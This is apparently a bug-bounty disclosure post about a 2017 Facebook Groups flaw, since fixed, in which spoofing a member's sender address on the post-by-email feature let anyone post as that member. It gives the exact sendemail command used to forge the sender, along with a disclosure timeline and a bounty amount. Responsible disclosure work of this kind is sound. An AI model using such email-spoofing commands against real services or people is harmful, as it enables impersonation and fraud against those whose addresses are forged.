Posting on groups as people whenever their email was known by an attacker.

Summary :

‘’Facebook groups are one of the most popular features where people discuss anything under the sun. There have been instances where such discussions have landed people in jail. That being the case, what if I could post something on behalf of you in a Facebook group? Well, the after effect depends on what I post on your behalf, Doesn’t it? Apparently there existed a vulnerability which could let you spoof anyone and post anything to a Facebook group.’’

Hey Everyone! I hope you all doing well, Today i want to share an issue i found in Facebook groups. I was looking for some other ways to post in Facebook groups which landed me to this link; https://www.facebook.com/help/206871819351594

According to the link we need to set a slug for our group and then group members/admins (only) can use email to post in group;

User emails “Hello test post” to group_slug@groups.facebook.com
- Facebook checks sender email is a group member or not
- If member, the email content get posted in group

So after understanding the feature i quicky set up a SMTP (used smtp2go), and a perl script called “sendemail” to send emails using our smtp server.

Command — perl sendemail.pl -f victim@email.com -t group_slug@groups.facebook.com -u Hello -m Whatsup -s smtp_host -xu smtp_username -xp smtp_password

Where -f = From Sender

  • -t = Target Email
  • -u = Subject
  • -m = message
  • -s = SMTP host with port
  • -xu = SMTP username
  • -xp = SMTP password

Response — Email sent successfully

I quickly refreshed group and found out that it was posted successfuly in the group :d

The only catch here was that you should be knowing the email address to spoof a member of a group. But there was a way around for this as well.

Proof of concept video

Thanks to Facebook for quick fix and for generous bounty amount.

  • Initial Report Sent — Wed, Jun 14, 2017 at 6:45 AM
  • Escalation by Facebook — Sat, Jun 17, 2017 at 5:00 AM
  • Fixed by Facebook — Same Day
  • Bounty Awarded by Facebook — Thu, Jun 29, 2017 at 12:59 AM - (7500usd)